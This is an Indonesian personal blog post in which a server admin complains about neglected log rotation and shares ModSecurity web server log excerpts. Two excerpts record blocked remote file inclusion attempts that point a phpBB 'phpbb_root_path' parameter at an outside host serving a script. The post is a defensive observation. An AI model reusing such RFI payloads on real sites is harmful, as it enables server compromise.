When Script Kiddies Attack

wahh……..udah masuk lagi kuliah (walopun jarang kuliah 😀 ), hummmm sekitar 1 mingguan ditinggal pulang ni serper, huakakakakak banyak bener log nya.. bejibun!!!! wakakaka emang dasarnya gw yang begok, lupak bikin crontab buat ngerotate log-log bejibun. kmaren gw liat di log webserver (mod security log), mak jang, gileee banyak banget cing!!!!! ampe puyeng gw bacanya………..

kalo gw liat dari log-log, rata rata terjadi attack 15 menit sekali.  mulai dari spam, RFI, LFI.. hummmmmmmmm……… nih sedikit gw kasi lognya (RFI):

==953aa80c==============================
Request: xxxxx.xxxxxx.x.x 72.149.42.126 – – [24/Oct/2007:23:30:33 +0700] “GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1” 500 1353 “-” “libwww-perl/5.65” – “-”
—————————————-
GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxxx.xxxx.xxxxx
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match “phpbb_root_path” at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: “8576a-549-d1366cc0;628b3780”
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
–953aa80c–

==7b81d714==============================
Request: xxxxx.xxxxx.x.x 72.149.42.126 – – [24/Oct/2007:23:30:34 +0700] “GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1” 500 1353 “-” “libwww-perl/5.65” – “-”
—————————————-
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxx.xxxxx.x.x
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match “phpbb_root_path” at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: “8576a-549-d1366cc0;62e80900”
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
–7b81d714–

 (xxxxx.xxxxx.x.x sengaja disamarkan)

itu sih cuman sebagian kecil dari log nya……. kalo gw keluarin disini, bisa mampus ntar yang bacanya -______________-.

tapi yang rada bikin sebel sih, rule buat blocking spam. wah, gila, banyak banget tuh log dari spamm, ada yang ke block, ada yang masih teros nylonong masuk -______________-.

ternyata lebi susah ngamanin web aplication ketimbang yang laen -______-

Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s